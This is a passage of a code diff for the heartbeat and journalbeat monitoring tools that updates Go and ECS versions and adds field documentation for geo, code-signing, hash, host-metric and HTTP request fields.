v1.21.1/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM= @@ -940,6 +958,8 @@ google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2 google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= google.golang.org/protobuf v1.24.0 h1:UhZDfRO8JRQru4/+LlLE0BRKGF8L+PICnvYZmx/fEGA= google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4= +google.golang.org/protobuf v1.25.0 h1:Ejskq+SyPohKW+1uil0JJMtmHCgJPJ/qWTxr8qp+R4c= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= gopkg.in/airbrake/gobrake.v2 v2.0.9/go.mod h1:/h5ZAUhDkGaJfjzjKLSjv6zCL6O0LLBxU4K+aSYdM/U= gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= diff --git a/heartbeat/Dockerfile b/heartbeat/Dockerfile index 0f6bdf7b3a3..8f2739234e3 100644 --- a/heartbeat/Dockerfile +++ b/heartbeat/Dockerfile 
@@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/heartbeat/cmd/root.go b/heartbeat/cmd/root.go index bfbfa22d1b4..d5b96e82a9c 100644 --- a/heartbeat/cmd/root.go +++ b/heartbeat/cmd/root.go @@ -41,7 +41,7 @@ const ( Name = "heartbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // RootCmd to handle beats cli diff --git a/heartbeat/docs/fields.asciidoc b/heartbeat/docs/fields.asciidoc index f3d5f451c00..73ceb5d61c5 100644 --- a/heartbeat/docs/fields.asciidoc +++ b/heartbeat/docs/fields.asciidoc @@ -96,6 +96,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cloud]] == Cloud provider metadata fields @@ -619,6 +628,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -676,6 +696,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -698,6 +730,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -711,9 +754,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: 
@@ -1028,6 +1074,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -1045,6 +1103,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -1068,6 +1138,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -1234,6 +1316,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -1291,6 +1384,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -1313,6 +1418,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- 
@@ -1326,9 +1442,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -1547,6 +1666,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -1570,6 +1701,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -1630,6 +1773,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -2375,6 +2527,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -2398,6 +2562,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -2546,6 +2722,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- 
@@ -3036,6 +3221,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -3093,6 +3289,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -3115,6 +3323,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -3152,8 +3371,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -3192,6 +3412,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host 
@@ -3210,6 +3439,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -3233,6 +3491,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -3290,6 +3559,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -3312,6 +3593,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -3345,10 +3637,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: 
@@ -3361,6 +3656,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -3638,6 +3969,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -4171,7 +4514,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object 
@@ -4235,7 +4578,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4254,6 +4597,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -4311,6 +4665,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -4333,6 +4699,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -4345,7 +4722,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object 
@@ -4409,7 +4786,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4429,10 +4806,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -5002,6 +5382,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -5025,6 +5417,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -5147,6 +5551,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- 
@@ -5201,6 +5614,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -5224,6 +5649,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -5346,6 +5783,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -6084,6 +6530,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -6141,6 +6598,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -6163,6 +6632,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- 
@@ -6176,9 +6656,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -6546,6 +7029,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -6603,6 +7097,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -6625,6 +7131,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -6638,9 +7155,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/heartbeat/include/fields.go b/heartbeat/include/fields.go index 98b1f1c67a5..cc872146209 100644 --- a/heartbeat/include/fields.go +++ b/heartbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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" + return "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" } 
diff --git a/journalbeat/Dockerfile b/journalbeat/Dockerfile index da708d84a56..ab9e7a4c3eb 100644 --- a/journalbeat/Dockerfile +++ b/journalbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/journalbeat/cmd/root.go b/journalbeat/cmd/root.go index 50ded0ee692..7f8dfcfe3b4 100644 --- a/journalbeat/cmd/root.go +++ b/journalbeat/cmd/root.go @@ -35,7 +35,7 @@ const ( Name = "journalbeat" // ecsVersion specifies the version of ECS that Winlogbeat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/journalbeat/docs/fields.asciidoc b/journalbeat/docs/fields.asciidoc index 9ba42f62289..db766dd7ca0 100644 --- a/journalbeat/docs/fields.asciidoc +++ b/journalbeat/docs/fields.asciidoc @@ -88,6 +88,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cloud]] == Cloud provider metadata fields @@ -1171,6 +1180,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -1228,6 +1248,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -1250,6 +1282,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- 
@@ -1263,9 +1306,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -1580,6 +1626,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -1597,6 +1655,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -1620,6 +1690,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -1786,6 +1868,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -1843,6 +1936,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- 
@@ -1865,6 +1970,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -1878,9 +1994,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -2099,6 +2218,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -2122,6 +2253,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -2182,6 +2325,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -2927,6 +3079,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- 
@@ -2950,6 +3114,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -3098,6 +3274,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -3588,6 +3773,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -3645,6 +3841,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -3667,6 +3875,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -3704,8 +3923,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -3744,6 +3964,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host 
@@ -3762,6 +3991,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -3785,6 +4043,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -3842,6 +4111,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -3864,6 +4145,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -3897,10 +4189,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: 
@@ -3913,6 +4208,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -4190,6 +4521,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -4723,7 +5066,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object 
@@ -4787,7 +5130,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4806,6 +5149,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -4863,6 +5217,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -4885,6 +5251,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -4897,7 +5274,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object 
@@ -4961,7 +5338,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4981,10 +5358,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -5554,6 +5934,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -5577,6 +5969,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -5699,6 +6103,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- 
